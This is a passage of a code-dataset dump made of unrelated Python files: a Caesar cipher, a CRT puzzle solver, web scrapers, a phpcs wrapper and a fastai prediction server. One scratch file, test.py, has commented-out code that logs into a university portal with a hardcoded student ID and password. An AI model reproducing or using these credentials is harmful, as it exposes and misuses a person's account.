Your_Movie='{}'.format(random.choice(lst)))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"328094866","text":"import matplotlib.pyplot as plt\nimport pickle\nimport numpy as np\n\nrnns = ['LSTM', 'RNN', 'NSRNN2','EXPRNN']\nrnns_name = ['LSTM', 'RNN', 'nnRNN','EXPRNN']\n# colors = ['lb', '']\nfig, ax = plt.subplots(nrows=1, ncols=1, figsize=(8, 8))\nfor idx,rnn in enumerate(rnns):\n with open('./pickle_files/'+rnn+'.pkl', 'rb') as handle:\n losses = pickle.load(handle)\n plt.plot(np.arange(1,801), losses, label=str(rnns_name[idx]))\n plt.title(\"Copy task for T=200\")\n plt.ylabel(\"Loss\")\n plt.xlabel(\"Iteration\")\n plt.xticks([0,200,400,600,800])\n# plt.ylim([0,1])\n# plt.yticks([0,0.25,0.5,0.75,1])\nax.legend()\nplt.show()\n","sub_path":"plot_addtask.py","file_name":"plot_addtask.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"35897555","text":"# noOfTerms = int(input(\"Enter the no. of terms : \"))\ntarget = int(input(\"Enter no. to be checked : \"))\nfirstNumber = 0\nsecondNumber = 1\nNextTerm = 0\nflag = True\nwhile(firstNumber <= target):\n # print(firstNumber,end=\" \")\n \n if(firstNumber == target):\n print(\"Yes\",target,\"is a fibonacci number\")\n flag = False\n break\n NextTerm = firstNumber + secondNumber\n firstNumber = secondNumber\n secondNumber = NextTerm\n\nif flag == True:\n print(target,\"is not a fibonacci number\")","sub_path":"general_algorithms/FibonacciSeries.py","file_name":"FibonacciSeries.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"625675579","text":"import json\n\npath = \"../data/math_results_\"\nname = lambda x: path + (str (x)) + \".json\" \nfiles = [json.load(open(name(x))) for x in range(0,64)]\nrawData = [{'u':datum['u'], 'v':datum['v'], 's':datum['s'], 't':datum['t']} \n for f in files for datum in f if datum]\n##print(rawData)\na = open(\"data1.json\", \"w\")\njson.dump(rawData,a)\n","sub_path":"dataAg.py","file_name":"dataAg.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"291610128","text":"\nimport re\nfrom collections import defaultdict, Counter\nfrom itertools import permutations, combinations,product\nfrom functools import lru_cache\nadj4 = [[0,1], [1,0], [-1,0], [0,-1]]\nadj8 = adj4+[[1,1], [-1,-1], [1,-1], [-1,1]]\n\ndef lmii(delim=\" \"):\n return list(map(int, input().split(delim)))\n\ndata = \"\"\"1007125\n13,x,x,41,x,x,x,x,x,x,x,x,x,569,x,29,x,x,x,x,x,x,x,x,x,x,x,x,x,x,x,x,19,x,x,x,23,x,x,x,x,x,x,x,937,x,x,x,x,x,37,x,x,x,x,x,x,x,x,x,x,17\"\"\"\n\n\ntest1 = \"\"\"939\n7,13,x,x,59,x,31,19\"\"\"\ntest2 = \"\"\"123\n17,x,13,19\"\"\"\ntest3 = \"\"\"\"\"\"\ntest4 = \"\"\"\"\"\"\nimport math\n\n\ndef extended_euclidean(a, b):\n if a == 0:\n return (b, 0, 1)\n else:\n g, y, x = extended_euclidean(b % a, a)\n return (g, x - (b // a) * y, y)\n\n # modular inverse driver function\n\n\ndef modinv(a, m):\n g, x, y = extended_euclidean(a, m)\n return x % m\n\n\n# function implementing Chinese remainder theorem\n# list m contains all the modulii\n# list x contains the remainders of the equations\ndef crt(m, x):\n # We run this loop while the list of\n # remainders has length greater than 1\n while True:\n\n # temp1 will contain the new value\n # of A. which is calculated according\n # to the equation m1' * m1 * x0 + m0'\n # * m0 * x1\n temp1 = modinv(m[1], m[0]) * x[0] * m[1] + \\\n modinv(m[0], m[1]) * x[1] * m[0]\n\n # temp2 contains the value of the modulus\n # in the new equation, which will be the\n # product of the modulii of the two\n # equations that we are combining\n temp2 = m[0] * m[1]\n\n # we then remove the first two elements\n # from the list of remainders, and replace\n # it with the remainder value, which will\n # be temp1 % temp2\n x.remove(x[0])\n x.remove(x[0])\n x = [temp1 % temp2] + x\n\n # we then remove the first two values from\n # the list of modulii as we no longer require\n # them and simply replace them with the new\n # modulii that we calculated\n m.remove(m[0])\n m.remove(m[0])\n m = [temp2] + m\n\n # once the list has only one element left,\n # we can break as it will only contain\n # the value of our final remainder\n if len(x) == 1:\n break\n\n # returns the remainder of the final equation\n return x[0]\ndef solve(data):\n\n lines = [i for i in data.splitlines()]\n\n targ = int(lines[0])\n bs = [i for i in lines[1].split(\",\")]\n ts = [(ind, int(bus)) for ind, bus in enumerate(bs) if bus!=\"x\"]\n ns = [int(bus) for t, bus in ts]\n ass = [bus-t for t, bus in ts]\n print(ns, ass)\n\n print(crt(ns, ass))\n\nsolve(test1)\nsolve(test2)\n#solve(test3)\n#solve(test4)\n\nsolve(data)\n\n\n\n\n\n\n","sub_path":"2020/Days - 1-15/Day 13/13_2.py","file_name":"13_2.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"94976536","text":"import argparse # modulo para adicionar argumentos de linha ao python\n\n# Definição do vetor de caracteres usado nos códigos\ncaracteres = []\n\n# Caracteres de A à Z\nfor i in range(26):\n caracteres.append(chr(i + 65))\n# Caracteres de a z\nfor i in range(26):\n caracteres.append(chr(i + 97))\n# Caracteres de 0 à 9\nfor i in range(10):\n caracteres.append(chr(i + 48))\n\n####################################### Argumentos #######################################################################\nparser = argparse.ArgumentParser(description='Cifra ou descifra uma mensagem') #container dos argumentos\n\n#adicionando argumentos\nparser.add_argument('-k', type=int, help= \"número a ser usado na codificação\")\nparser.add_argument('-i', '--input', type = str, help= 'nome do arquivo a cifrar / Descriptografar')\nparser.add_argument('-o', '--output', type = str, help= 'nome do arquivo de saida')\ngrupo = parser.add_mutually_exclusive_group() # O próprio nome diz,cria um grupo que é um argumento ou outro\ngrupo.add_argument('-c','--cifrar', action='store_true', help = 'cifra texto' )\ngrupo.add_argument('-d','--decifrar', action='store_true', help = 'descifra texto' )\n\n#lista de argumentos com todas as propriedades\nargs = parser.parse_args()\n\n#Relacionando argumentos\nk=args.k\nnome_do_texto = args.input\nsaida = args.output\n##################################### Funções de Cifrar e Descifrar respectivamente ###############################\n\ndef cifrar(nome_do_texto, k,saida):\n\n frase_criptografada = []\n\n with open(nome_do_texto, 'r+') as texto_aberto:\n c = texto_aberto.read(1)\n\n while len(c)>0:\n if c in caracteres:\n # se for 61 volta pro indice 0\n x = caracteres[(caracteres.index(c) + k)%len(caracteres)]\n c = texto_aberto.read(1)\n frase_criptografada.append(x)\n else:\n c = texto_aberto.read(1)\n\n\n\n with open(saida, 'w') as texto_criptografado:\n for i in range(len(frase_criptografada)):\n texto_criptografado.write(frase_criptografada[i])\n\n\ndef descifrar(nome_do_texto,k,saida):\n\n lista_descriptografada = []\n\n with open(nome_do_texto, 'r') as texto_cifrado:\n c = texto_cifrado.read(1)\n\n while len(c) > 0:\n if c in caracteres:\n # se for 61 volta pro indice 0\n x = caracteres[(caracteres.index(c) - k) % len(caracteres)]\n c = texto_cifrado.read(1)\n lista_descriptografada.append(x)\n else:\n c = texto_cifrado.read(1)\n\n\n\n with open(saida, 'w') as frase_descriptografada:\n for i in range(len(lista_descriptografada)):\n frase_descriptografada.write(lista_descriptografada[i])\n\n############################################ Seleção de Opções #################################################\nif(args.cifrar==False and args.decifrar== False ):\n if (args.input is None):\n nome_do_texto = input(\"digite o nome do arquivo a criptografar ou descriptografar\\n\")\n if (args.k is None):\n k = int(input(\"digite o valor da chave\\n\"))\n if (args.output is None):\n saida = input(\"Digite o nome do arquivo de saida\\n\")\n while (True):\n op = int(input(\"Digite\\n 1-Criptografar\\n 2-Descriptografar\\n\"))\n if (op == 1):\n cifrar(nome_do_texto,k,saida)\n break\n if (op ==2):\n descifrar(nome_do_texto, k, saida)\n break\n else:\n print(\"opção invalida\\n Reselecione a opção\")\n\nif(args.cifrar==True):\n if(args.input is None):\n nome_do_texto = input(\"digite o nome do arquivo a criptografar\\n\")\n if (args.k is None):\n k = int(input(\"digite o valor da chave\\n\"))\n if (args.output is None):\n saida = input(\"Digite o nome do arquivo de saida\\n\")\n cifrar(nome_do_texto, k, saida)\nif(args.decifrar==True):\n if (args.input is None):\n nome_do_texto = input(\"digite o nome do arquivo a descriptografar\\n\")\n if (args.k is None):\n k = int(input(\"digite o valor da chave\\n\"))\n if (args.output is None):\n saida = int(input(\"Digite o nome do arquivo de saida\\n\"))\n descifrar(nome_do_texto, k, saida)\n\n\n\n\n\n\n\n\n","sub_path":"Cifradores e Analisadores de Frêquencia (Trabalho 1)/Cifrador_Cesar.py","file_name":"Cifrador_Cesar.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"447237471","text":"# Equilibrium index of an array\n# Equilibrium index of an array is an index such that the sum of elements at lower indexes is equal to the sum of elements at higher indexes.\n# For example, in an array A:\n# Input : A[] = {-7, 1, 5, 2, -4, 3, 6}\n# Output : 3\n# 3 is an equilibrium index, because:\n# A[0] + A[1] + A[2] = A[4] + A[5] + A[6]\n\ndef EqulibriumIndex(ary):\n\n sum=0\n left_sum=0\n\n for i in range(0,len(ary)):\n sum=sum+ary[i]\n\n for i in range(0,len(ary)):\n\n sum=sum-ary[i]\n if left_sum==sum and i!=len(ary)-1:\n return i\n else:\n left_sum=left_sum+ary[i]\n\n return -1\n\ndef main():\n \n ary=[-7, 1, 5, 2, -4, 3, 6]\n print(EqulibriumIndex(ary))\n\n ary = [-7, 1, 5, 2, -4, 3, 0]\n print(EqulibriumIndex(ary))\n\nif __name__=='__main__':\n main()","sub_path":"python/CodingExercises/EqulibriumIndex.py","file_name":"EqulibriumIndex.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"375341697","text":"# coding=utf-8\nimport Tkinter\nimport tkMessageBox\n\ndef show():\n tkMessageBox.showinfo(title='aaa', message='bbb')\n\ndef creatfram():\n root = Tkinter.Tk()\n b = Tkinter.Button(root, text=\"关于\", command=show)\n b.pack()\n root.mainloop()\n\ncreatfram()","sub_path":"test/tt1.py","file_name":"tt1.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"63985213","text":"\"\"\"\n反转一个字符串中的元音字母\n\"\"\"\n\nclass Solution:\n def reverseVowels(self, s: str) -> str:\n if len(s) == 0:return ''\n i, j = 0, len(s)-1\n v = ['a','e','i','o','u','A','E','I','O','U']\n ans = list(s)\n while j >= i:\n if ans[i] in v:\n if ans[j] in v:\n ans[i], ans[j] = ans[j], ans[i]\n i+=1\n j-=1\n else:\n j-=1\n else:\n i+=1\n return ''.join(ans)","sub_path":"python/0345.Reverse Vowels of a String.py","file_name":"0345.Reverse Vowels of a String.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"589487796","text":"import csv\nfrom urllib.request import urlopen\nfrom urllib.parse import quote_plus\nfrom bs4 import BeautifulSoup\nimport os\nimport ShoppingUI\n\ndef crowlingShoppingList():\n global search\n url = f'https://msearch.shopping.naver.com/search/all?query={quote_plus(search)}'\n html = urlopen(url).read()\n global soup\n soup = BeautifulSoup(html,'html.parser')\n total = soup.select('._2TFfLkGZhc')\n global SearchList\n SearchList = []\n num=1\n for i in total:\n temp = []\n tagname = search+str(num)\n names = i.select('._3ldP-RMmbZ')\n name = names[0].text\n prices = i.select('._1vPmSw6Psr')\n price = prices[0].find(\"strong\").text + '원'\n url = soup.select('._1SwezRSbBH > a')[0]['href']\n\n urls = i.select('._2oDyaXK-qb')[0]\n siteURL = urls.get('href')\n if siteURL == None:\n siteURL = i.get('href')\n\n imageurls = i.select('._2oDyaXK-qb > img')[0]\n imgaeURL = imageurls.get('src')\n\n num += 1\n temp.append(tagname)\n temp.append(name)\n temp.append(price)\n temp.append(siteURL)\n temp.append(imgaeURL)\n SearchList.append(temp)\n\n\n\n#액셀 저장\ndef excelsavefile(search):\n try:\n if not os.path.exists(\"쇼핑리스트저장파일\"):\n os.makedirs(\"쇼핑리스트저장파일\")\n except:\n pass\n f = open(f'쇼핑리스트저장파일/{search}쇼핑리스트.csv','w', newline='')\n csvWriter = csv.writer(f)\n for i in SearchList:\n csvWriter.writerow(i)\n f.close()\n\n print(\"Excel_Save_Done!!\")\n #\n\n#이미지 저장\ndef imagesavefile(filename):\n foldername = f'{filename}이미지저장파일'\n try:\n if not os.path.exists(foldername):\n os.makedirs(foldername)\n except:\n pass\n images = soup.select('._2oDyaXK-qb > img')\n n=1\n for i in images:\n imgURL = i.attrs['src']\n with urlopen(imgURL) as f:\n with open(foldername+\"/\"+search + str(n)+ '.jpg', 'wb') as h:\n img = f.read()\n h.write(img)\n n += 1\n print('ImageDown_Done!!')","sub_path":"Project/CrowlingShoppingList.py","file_name":"CrowlingShoppingList.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"574508545","text":"from scrapy.selector import Selector\n\nclass Extractor:\n @staticmethod\n def push_chapter(chapters, itr, title, content):\n chapters.append({\n 'title': str(itr + 1) + '. ' + title,\n 'content': content\n })\n @staticmethod\n def generate_tree(titles, lessons, own_chapters):\n ret = []\n tmp_chapter_title = None\n tmp_chapter_content = []\n abs_video_itr = 0\n chapter_itr = -1\n rel_video_itr = -1\n for x in own_chapters:\n # replace slash character in order to avoid creating new directory node\n x = x.replace('/', '-')\n cond1 = x != tmp_chapter_title and tmp_chapter_title is not None\n cond2 = tmp_chapter_title is None\n if cond1:\n Extractor.push_chapter(ret, chapter_itr, tmp_chapter_title, tmp_chapter_content)\n if cond1 or cond2:\n tmp_chapter_title = x\n tmp_chapter_content = []\n rel_video_itr=0\n chapter_itr+=1\n else:\n rel_video_itr+=1\n title = str(chapter_itr+1)\n title += '.'\n title += str(rel_video_itr+1)\n title += ' '\n title += titles[abs_video_itr]\n # replace slash character in order to avoid creating new directory node\n title = title.replace('/', '-')\n lesson = lessons[abs_video_itr]\n tmp_chapter_content.append({\n 'title': title,\n 'lesson': lesson\n })\n abs_video_itr+=1\n Extractor.push_chapter(ret, chapter_itr, tmp_chapter_title, tmp_chapter_content)\n return ret\n @staticmethod\n def extract_vimeo_permalink(session, lesson):\n selector = Selector(session.get(lesson, verify=True))\n node = '//iframe[@id=\"lessonPlayer\"]/@src'\n ret = selector.xpath(node).extract()[0]\n return ret\n @staticmethod\n def extract_course_metadata(session, course):\n response = session.get(course, verify=True)\n selector = Selector(response)\n playlist_tree = [\n 'div[@class=\"coursePageModulesList\"]',\n 'div[@class=\"listwrapper\"]'\n ]\n leaf_node_lesson_link_key = './/a/@href'\n leaf_node_title_key = './/a/text()'\n leaf_node_own_chapter_key = './/div[@class=\"comstatus\"]/@data-modname'\n xpath = '//'\n for x in playlist_tree:\n if xpath != '//':\n xpath += '/'\n xpath += x\n modules_list = selector.xpath(xpath)\n lessons = modules_list.xpath(leaf_node_lesson_link_key).extract()\n titles = modules_list.xpath(leaf_node_title_key).extract()\n own_chapters = modules_list.xpath(leaf_node_own_chapter_key).extract()\n\n course_title_tree = [\n 'div[@class=\"coursePageHeaderInfoTitle\"]',\n 'h1/text()'\n ]\n xpath = '//'\n\n for x in course_title_tree:\n if xpath != '//':\n xpath += '/'\n xpath += x\n\n course_title = selector.xpath(xpath).extract()[0]\n\n return {\n 'title': course_title,\n 'playlist': Extractor.generate_tree(titles, lessons, own_chapters)\n }","sub_path":"ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"630902595","text":"# -*- coding: utf-8 -*-\nimport subprocess32\nimport tempfile\nimport shutil\nimport glob\nfrom os import path\n\nimport const\n\nclass Prepare:\n def _compile(self):\n print(' Compiling...')\n\n # Prepare\n self.tmpdir = tempfile.mkdtemp()\n source = path.join(self.tmpdir, 'source.txt')\n with open(source, 'w', newline='\\n') as f:\n f.write(self.ai['sourceCode'])\n\n # Compile\n target = path.join(self.tmpdir, 'client')\n simulatorPath = '../simulators/' + self.ai['name'] + '.py'\n cflags = ['python3', simulatorPath, source]\n child = subprocess32.Popen(cflags, stdout=subprocess32.PIPE, stderr=subprocess32.PIPE)\n try:\n self.compile_timeout = False\n self.compile_stdout, self.compile_stderr = child.communicate(timeout=10)\n except subprocess32.TimeoutExpired:\n self.compile_timeout = True\n self.compile_stdout = self.compile_stderr = \"Timeout\"\n with open(target, 'w', newline='\\n') as f:\n f.write(self.compile_stdout)\n return False\n\n self.compile_stdout = self.compile_stdout.decode('utf-8')\n self.compile_stderr = self.compile_stderr.decode('utf-8')\n with open(target, 'w', newline='\\n') as f:\n f.write(self.compile_stdout)\n\n exitcode = child.returncode\n if exitcode != 0:\n return False\n\n # Move client to the specific directory\n ai_name = 'ai_' + str(self.ai['_id'])\n self.abspath = path.join(const.AI_SAVE_DIRECTORY, ai_name)\n shutil.move(target, self.abspath)\n return True\n\n def _clean(self):\n shutil.rmtree(self.tmpdir)\n\n def __init__(self, ai):\n self.ai = ai\n\n def Run(self):\n result = { 'status': 'failure' }\n if not self._compile():\n if not self.compile_timeout:\n result['error'] = 'Simulation Failed. STDERR:\\n' + self.compile_stderr\n else:\n result['status'] = 'timeout'\n result['error'] = 'Simulation Timeout\\n'\n else:\n result['status'] = 'success'\n result['abspath'] = self.abspath\n result['info'] = self.compile_stdout + '\\n' + self.compile_stderr\n self._clean()\n return result\n","sub_path":"daemon/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"15986015","text":"import subprocess\nimport os\n\nclass PhpCs(object):\n \"\"\"\n Wraps the command line for \n phpcs\n \"\"\" \n def __init__(self, standard:'the standard to use when running the phpcs analysis'='PSR2'):\n php_cs = subprocess.Popen(['phpcs', '-i'], stdout=subprocess.PIPE)\n out, error = php_cs.communicate()\n if (out.find(standard.encode('utf-8')) == -1) and not os.path.isfile(standard):\n raise ValueError('The specified standard {0} is not installed'.format(standard))\n self._standard = standard\n\n def standard():\n doc = \"The standard property.\"\n def fget(self):\n return self._standard\n def fdel(self):\n del self._standard\n return locals()\n standard = property(**standard())\n\n def run(self, input:'the array of tuples (fileName, contents)'):\n \"\"\"\n Executes phpcs using the coding standard specified in the constructor\n and returns a string, with the stdout of the commmand\n if return code is 0, the stdout will be ''.\n \"\"\"\n outPut = ''\n returncode = 0\n\n for dataTuple in input:\n fileContents = dataTuple[1]\n fileName = dataTuple[0]\n if fileContents == \"\":\n outPut = outPut + fileName + \" is an empty file\"\n returncode = 1\n continue\n \n php_cs = subprocess.Popen(['phpcs', '--standard=' + self._standard], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = php_cs.communicate(input=dataTuple[1].encode('utf-8'))\n # If phpcs return code is greater than\n # 0 then that means that we had problem with one of the files\n # so we will return a non-zero error code \n if php_cs.returncode:\n returncode = 1\n errorCode = php_cs.returncode\n outString = out.decode('utf-8')\n outString = outString.replace('STDIN', dataTuple[0])\n outPut = outPut + outString\n return (returncode, outPut)\n","sub_path":"vomeron/php.py","file_name":"php.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"492405352","text":"import aiohttp\nimport asyncio\nimport uvicorn\nfrom fastai import *\nfrom fastai.vision import *\nfrom io import BytesIO\nfrom starlette.applications import Starlette\nfrom starlette.middleware.cors import CORSMiddleware\nfrom starlette.responses import HTMLResponse, JSONResponse\nfrom starlette.staticfiles import StaticFiles\n\n\nexport_one_pad_file_url = 'https://drive.google.com/uc?export=download&id=16QyNnQEDZl6y3uDVxCSQ_AwrF67_Jahs'\nexport_one_pad_file_name = 'resnet50_one_pad_87_acc_6_june.pkl'\n\nexport_two_pads_file_url = 'https://drive.google.com/uc?export=download&id=1KpYllvvVCLiXRsCck14aXn-O808ZKA8r'\nexport_two_pads_file_name = 'resnet50_81_acc_29_may_2019.pkl'\n\nexport_uric_acid_file_url = 'https://drive.google.com/uc?export=download&id=1pDknKzHPeS93CCtZnwZEorzcodmFXclP'\nexport_uric_acid_file_name = 'resnet50_UA_89_acc_20_june_2019.pkl'\n\npath = Path(__file__).parent\n\nmodels_path = path / \"models\"\n\none_pad_model_path = models_path / \"one_pad_model\"\ntwo_pads_model_path = models_path / \"two_pads_model\"\nuric_acid_model_path = models_path / \"uric_acid_model\"\n\napp = Starlette()\napp.add_middleware(CORSMiddleware, allow_origins=['*'], allow_headers=['X-Requested-With', 'Content-Type'])\napp.mount('/static', StaticFiles(directory='app/static'))\n\n\n# Ensure the dir exists at the current path.\ndef ensure_dir(dir_name):\n if not os.path.exists(dir_name):\n os.mkdir(dir_name, mode=0o777)\n print('Created %s directory' % dir_name)\n\nasync def download_file(url, dest):\n if dest.exists():\n print(\"File already exists.\")\n return\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n data = await response.read()\n with open(dest, 'wb') as f:\n f.write(data)\n\n\nasync def setup_one_pad_learner():\n print('Start downloading one pad model.')\n await download_file(export_one_pad_file_url, one_pad_model_path / export_one_pad_file_name)\n try:\n learn = load_learner(one_pad_model_path, export_one_pad_file_name)\n return learn\n except RuntimeError as e:\n if len(e.args) > 0 and 'CPU-only machine' in e.args[0]:\n print(e)\n message = \"\\n\\nThis model was trained with an old version of fastai and will not work in a CPU environment.\\n\\nPlease update the fastai library in your training environment and export your model again.\\n\\nSee instructions for 'Returning to work' at https://course.fast.ai.\"\n raise RuntimeError(message)\n else:\n raise\n\n\nasync def setup_two_pad_learner():\n print('Start downloading two pad model.')\n await download_file(export_two_pads_file_url, two_pads_model_path / export_two_pads_file_name)\n try:\n learn = load_learner(two_pads_model_path, export_two_pads_file_name)\n return learn\n except RuntimeError as e:\n if len(e.args) > 0 and 'CPU-only machine' in e.args[0]:\n print(e)\n message = \"\\n\\nThis model was trained with an old version of fastai and will not work in a CPU environment.\\n\\nPlease update the fastai library in your training environment and export your model again.\\n\\nSee instructions for 'Returning to work' at https://course.fast.ai.\"\n raise RuntimeError(message)\n else:\n raise\n\nasync def setup_uric_acid_learner():\n print('Start downloading uric acid model.')\n await download_file(export_uric_acid_file_url, uric_acid_model_path / export_uric_acid_file_name)\n try:\n learn = load_learner(uric_acid_model_path, export_uric_acid_file_name)\n return learn\n except RuntimeError as e:\n if len(e.args) > 0 and 'CPU-only machine' in e.args[0]:\n print(e)\n message = \"\\n\\nThis model was trained with an old version of fastai and will not work in a CPU environment.\\n\\nPlease update the fastai library in your training environment and export your model again.\\n\\nSee instructions for 'Returning to work' at https://course.fast.ai.\"\n raise RuntimeError(message)\n else:\n raise\n\nensure_dir(one_pad_model_path)\nensure_dir(two_pads_model_path)\nensure_dir(uric_acid_model_path)\n\nloop = asyncio.get_event_loop()\n\ntasks = [asyncio.ensure_future(setup_one_pad_learner())]\n\none_pad_model = loop.run_until_complete(asyncio.gather(*tasks))[0]\n\ntasks = [asyncio.ensure_future(setup_two_pad_learner())]\n\ntwo_pad_model = loop.run_until_complete(asyncio.gather(*tasks))[0]\n\ntasks = [asyncio.ensure_future(setup_uric_acid_learner())]\n\nuric_acid_model = loop.run_until_complete(asyncio.gather(*tasks))[0]\n\nloop.close()\n\n\n@app.route('/')\nasync def homepage(request):\n html_file = path / 'view' / 'index.html'\n return HTMLResponse(html_file.open().read())\n\n\n@app.route('/analyze_two_pads', methods=['POST'])\nasync def analyze_two_pads(request):\n print('analyze_two_pads call')\n img_data = await request.form()\n img_bytes = await(img_data['file'].read())\n img = open_image(BytesIO(img_bytes))\n prediction = two_pad_model.predict(img)[0]\n return JSONResponse({'result': str(prediction)})\n\n\n@app.route('/analyze_one_pad', methods=['POST'])\nasync def analyze_one_pad(request):\n print('analyze_one_pad call')\n img_data = await request.form()\n img_bytes = await(img_data['file'].read())\n img = open_image(BytesIO(img_bytes))\n prediction = one_pad_model.predict(img)[0]\n return JSONResponse({'result': str(prediction)})\n\n\n@app.route('/analyze_uric_acid_strip', methods=['POST'])\nasync def analyze_uric_acid_strip(request):\n print('analyze_uric_acid_strip call')\n img_data = await request.form()\n img_bytes = await(img_data['file'].read())\n img = open_image(BytesIO(img_bytes))\n prediction = uric_acid_model.predict(img)[0]\n return JSONResponse({'result': str(prediction)})\n\n\nif __name__ == '__main__':\n if 'serve' in sys.argv:\n uvicorn.run(app=app, host='0.0.0.0', port=5000, log_level=\"info\")\n","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"456233108","text":"import pickle\nimport requests\nimport urllib.request\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport re\n\n# driver = webdriver.Chrome()\n# driver = webdriver.PhantomJS()\n# driver.get('http://idas.uestc.edu.cn/authserver/login?service=http%3A%2F%2Fportal.uestc.edu.cn%2F')\n\n# username = driver.find_element_by_name('username')\n# password = driver.find_element_by_name('password')\n\n# username.send_keys('2015060103012')\n# password.send_keys('101387')\n# password.send_keys(Keys.RETURN)\n\n# cookies = driver.get_cookies()\n# for cookie in cookies:\n# \tprint(cookie)\n\n# pickle.dump(cookies, open('uestc.cookie', 'wb'))\n\n# driver = webdriver.Chrome()\n# cookies = pickle.load(open('uestc.cookie', 'rb'))\n# for cookie in cookies:\n# \tdriver.add_cookie(cookie)\n\n# driver.get('http://portal.uestc.edu.cn/?.pn=p346')\n# cookies = driver.get_cookies()\n# for cookie in cookies:\n# \tprint(cookie)\n\n# cookies = pickle.load(open('uestc.cookie', 'rb'))\n\n# s = requests.Session()\n# for cookie in cookies:\n# \ts.cookies.set(cookie['name'], cookie['value'])\n# response = s.get('http://portal.uestc.edu.cn/?.pn=p346')\n# html = response.text\n# print(html)\n\n# with open('uestc.html', 'w') as f:\n# \tf.write(response.text)\n\n# cookies = pickle.load(open('uestc.cookie', 'rb'))\n# # for cookie in cookies:\n# # \tprint(cookie)\n\n# request = urllib.request.Request('http://portal.uestc.edu.cn/?.pn=p346')\n# response = urllib.request.urlopen(request)\n\n# print(response.read().decode('utf-8'))\n\n# string = '怎样才能不劳而获'\n\n# print(string)\n# print(string)\n# string = string.decode('gbk')\n# print(string)\n# with open('test.txt', 'a') as f:\n# \tf.write(string)\n\n# driver = webdriver.Chrome()\n# driver.get('http://portal.uestc.edu.cn/?.pn=p346')\n# username = driver.find_element_by_id('username')\n# password = driver.find_element_by_id('password')\n\n# username.send_keys('2015060103012')\n# password.send_keys('101387')\n# password.send_keys(Keys.RETURN)\n\n##################################################\n# import urllib.request\n\n# url = 'http://www.baidu.com'\n\n# print('===============first')\n# response1 = urllib.request.urlopen(url)\n# print(response1.getcode())\n# print(len(response1.read().decode('utf-8')))\n\n# print('===============second')\n# request = urllib.request.Request(url)\n# response2 = urllib.request.urlopen(request)\n# print(response2.getcode())\n# # print(response2.read().decode('utf-8'))\n# print(len(response2.read().decode('utf-8')))\n\n# print('===============third')\n# import http.cookiejar\n# cj = http.cookiejar.LWPCookieJar()\n# # cj = http.cookiejar.MozillaCookieJar()\n# # cj = http.cookiejar.FileCookieJar()\n# opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))\n# # request = opener.urlopen(url)\n# response3 = opener.open(url)\n# print(cj)\n# print(response3.getcode())\n# # print(response3.read().decode('utf-8'))\n# print(len(response3.read().decode('utf-8')))\n\nfrom bs4 import BeautifulSoup\n\nhtml_doc = \"\"\"\nThe Dormouse's story\n\n

The Dormouse's story

\n\n

Once upon a time there were three little sisters; and their names were\nElsie,\nLacie and\nTillie;\nand they lived at the bottom of a well.

\n\n

...

\n\"\"\"\n\nsoup = BeautifulSoup(html_doc,'html.parser')\n# all_a = soup.find_all('a')\n# for a in all_a:\n# \tprint(a.get_text())\n\nprint('=================get all the link')\nlinks = soup.find_all('a')\nfor link in links:\n\tprint(link.name, link['href'], link.get_text())\n\nprint('=================get the lacie') \nlacie = soup.find('a', id = 'link2')\nprint(lacie.name, lacie['href'], lacie.get_text())\n\nprint('=================get the lacie by regular')\nlacie = soup.find('a', href = re.compile(r'ill'))\nprint(lacie.name, lacie['href'], lacie.get_text())\n\nprint('=================get the p')\np_node = soup.find('p', class_ = 'title')\nprint(p_node.name, p_node.get_text())","sub_path":"LearnCode/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"304930801","text":"from multiprocessing import Process, Queue\nimport time\nimport random\n\n\ndef put_num(q):\n for i in range(5):\n q.put(i)\n print('得到数据--', i)\n time.sleep(random.random())\n\n\ndef get_num(q):\n while True:\n if not q.empty():\n data = q.get(True)\n print('取出数据-----', data)\n time.sleep(random.random())\n else:\n break\n\n\ndef main():\n q = Queue()\n t2 = Process(target=get_num, args=(q, ))\n t1 = Process(target=put_num, args=(q, ))\n t1.start()\n t1.join()\n\n t2.start()\n 